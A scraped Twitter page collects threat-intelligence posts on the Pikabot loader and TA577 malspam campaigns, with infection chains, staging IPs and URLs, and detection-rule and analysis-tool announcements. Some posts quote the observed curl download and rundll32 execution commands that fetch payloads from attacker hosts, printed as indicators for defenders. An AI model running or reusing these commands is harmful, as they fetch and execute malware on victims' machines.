Mangusta(@Tac_Mangusta) 's Twitter Profile Photo

malspam spotted in 🇮🇹

EML(Thread Hijacking)>.iso>.exe>cmd.exe curl>.png (.dll)>ctfmon.exe -p 1234

Trend Micro, Inc.

🔗Staging
s://yourunitedlaws,com/mrD/8372

#Pikabot #TA577 malspam spotted in #Italy 🇮🇹

EML(Thread Hijacking)>.iso>.exe>cmd.exe curl>.png (.dll)>ctfmon.exe -p 1234

Trend Micro, Inc.

🔗Staging
s://yourunitedlaws,com/mrD/8372
account_circle
Nasreddine Bencherchali(@nas_bench) 's Twitter Profile Photo

🦸 release r2024-01-29 is here.

🌟7 New Rules
🛡️30 Rule updates
🔬11 Rule Fixes

This release includes

- uncommon DLL loading and updates to older Pikabot related rules.
- CodePage modification via the built-in MODE utility as seen in the wild.
- CLI and

🦸#SigmaHQ release r2024-01-29 is here.

🌟7 New Rules
🛡️30 Rule updates
🔬11 Rule Fixes

This release includes

- #Pikabot uncommon DLL loading and updates to older Pikabot related rules.
- CodePage modification via the built-in MODE utility as seen in the wild.
- CLI and
account_circle
Mangusta(@Tac_Mangusta) 's Twitter Profile Photo

malspam spotted in 🇮🇹

Back to 'classic' TTPs

EML(Thread Hijacked with modified stolen old conv)>.zip>.js (curl)>.dat>.exe>ctfmon.exe

#Pikabot malspam spotted in #Italy 🇮🇹

Back to 'classic' TTPs

EML(Thread Hijacked with modified stolen old conv)>.zip>.js (curl)>.dat>.exe>ctfmon.exe
account_circle
Mangusta(@Tac_Mangusta) 's Twitter Profile Photo

malspam spotted in 🇮🇹

🔥new TTPs

EML(stolen old conv)>.zip(psw protect)>👉.jar>filename.exe>ctfmon.exe

ctfmon.exe -p 123

#Pikabot #TA577 malspam spotted in #Italy 🇮🇹

🔥new TTPs

EML(stolen old conv)>.zip(psw protect)>👉.jar>filename.exe>ctfmon.exe 

ctfmon.exe -p 123
account_circle
Zscaler ThreatLabz(@Threatlabz) 's Twitter Profile Photo

ThreatLabz has released an IDA plugin to deobfuscate the strings for previous versions of .

Read our blog here: zscaler.com/blogs/security…

The source code for the IDA plugin can be found here: github.com/threatlabz/pik…

ThreatLabz has released an IDA plugin to deobfuscate the strings for previous versions of #Pikabot.

Read our blog here: zscaler.com/blogs/security…

The source code for the IDA plugin can be found here: github.com/threatlabz/pik…
account_circle
reecDeep(@reecdeep) 's Twitter Profile Photo

⚠️TA577 starts spreading

eml>.zip>.html(link)

html files with 0 detections on Virustotal and decoy latin words
🔥staging ip:
204.44.125.68
103.124.104.76
103.124.104.22
66.63.188.19
104.129.20.167

⚠️TA577 starts spreading #Pikabot #malware  

eml>.zip>.html(link)

html files with 0 detections on Virustotal and decoy latin words
🔥staging ip:
204.44.125.68
103.124.104.76
103.124.104.22
66.63.188.19
104.129.20.167

#infosecurity #CyberAttack
account_circle
delivr.to(@delivr_to) 's Twitter Profile Photo

A new sample added to the collection ⚡️🤖

✅ OneDrive branded PDF lure
✅ Heavily-obfuscated Zipped JScript Download
✅ Curl and Rundll32 for next-stage DLL download and execution

Test your defences now: delivr.to/payloads?id=a2…

🧵

account_circle
ANY.RUN(@anyrun_app) 's Twitter Profile Photo

🚨 Beware of Pikabot ! This sneaky loader malware appeared in 2023 and keeps evolving. Now in its latest version as of February 2024, poses a serious threat with anti-analysis features and flexible capabilities.

Learn more 👇
any.run/malware-trends…

🚨 Beware of Pikabot #malware! This sneaky loader malware appeared in 2023 and keeps evolving. Now in its latest version as of February 2024, #Pikabot poses a serious threat with anti-analysis features and flexible capabilities. 

Learn more 👇
any.run/malware-trends…
account_circle
vx-underground(@vxunderground) 's Twitter Profile Photo

We've updated the vx-underground malware families collection

- AgentTesla
- Amadey
- Android.Chameleon
- Android.WyrmSpy
- AsyncRAT
- AveMaria
- DarkGateLoader
- GootLoader
- INCRansomware
- IPStorm
- LummaStealer
- Nanocore
- Pikabot
- RecordBreaker
- Remcos
- Stealc

We've updated the vx-underground malware families collection

- AgentTesla
- Amadey
- Android.Chameleon
- Android.WyrmSpy
- AsyncRAT
- AveMaria
- DarkGateLoader
- GootLoader
- INCRansomware
- IPStorm
- LummaStealer
- Nanocore
- Pikabot
- RecordBreaker
- Remcos
- Stealc
account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- .iso > .exe > .dll > .curl > .dll

T1574 - DLL Search Order Hijacking

Open_Document.exe - 'Microsoft Write'

cmd /c md c:\wnd

curl -o c:\wnd\3291.png --url https://yourunitedlaws.]com/mrD/4462

rundll32 c:\wnd\3291.png,GetModuleProp

IOC's
github.com/pr0xylife/Pika…

#Pikabot - .iso > .exe > .dll > .curl > .dll

T1574 - DLL Search Order Hijacking

Open_Document.exe - 'Microsoft Write' 

cmd /c md c:\wnd

curl -o c:\wnd\3291.png --url https://yourunitedlaws.]com/mrD/4462

rundll32 c:\wnd\3291.png,GetModuleProp

IOC's
github.com/pr0xylife/Pika…
account_circle
LFTPika デュオ固定@1(@Pikabot1214) 's Twitter Profile Photo

鯖メンバー募集 メイン鯖にできる人 ある程度常識ある人 いっぱい練習してます良ければ来てほしいです
3V3や4V4とかやりたいです

鯖メンバー募集 メイン鯖にできる人 ある程度常識ある人 いっぱい練習してます良ければ来てほしいです  
3V3や4V4とかやりたいです  
#フォートナイト #メンバー募集中 #身内鯖募集
account_circle
VMRay(@vmray) 's Twitter Profile Photo

🚨 : ( / ) uncovered in &

🔎 VMRay Labs identified in samples. This evasion technique for & is a well-known open-source framework whose usage we've tracked back to

🧵

🚨#Alert: #SysWhispers2 (#directsyscalls/#indirectsyscalls) uncovered in #Pikabot & #QBot

🔎 VMRay Labs identified #SysWhispers2 in #Pikabot samples. This evasion technique for #AVs & #EDRs is a well-known open-source framework whose usage we've tracked back to #QBot

🧵
account_circle
Cryptolaemus(@Cryptolaemus1) 's Twitter Profile Photo

- - .zip > .js > curl > .exe

- A.P.Hernandez

wscript ION.js

cmd /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh

curl http://103.124.105.]147/KNaDVX/99.dat -o C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\jda.exe

(1/3)👇

IOC's
github.com/pr0xylife/Pika…

#Pikabot - #TA577 - .zip > .js > curl > .exe

#Signed - A.P.Hernandez

wscript ION.js

cmd /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh

curl http://103.124.105.]147/KNaDVX/99.dat -o C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\jda.exe

(1/3)👇

IOC's
github.com/pr0xylife/Pika…
account_circle
Deutsche Telekom CERT(@DTCERT) 's Twitter Profile Photo

⚠️ This week, threat actor introduced a rather interesting new approach to distribute their malware. Victim users received an spreadsheet prompting them to click on the contained button to view 'files from the cloud'. 🧵1/4

⚠️ This week, threat actor #TA577 introduced a rather interesting new approach to distribute their #Pikabot malware. Victim users received an #Excel spreadsheet prompting them to click on the contained button to view 'files from the cloud'. 🧵1/4
account_circle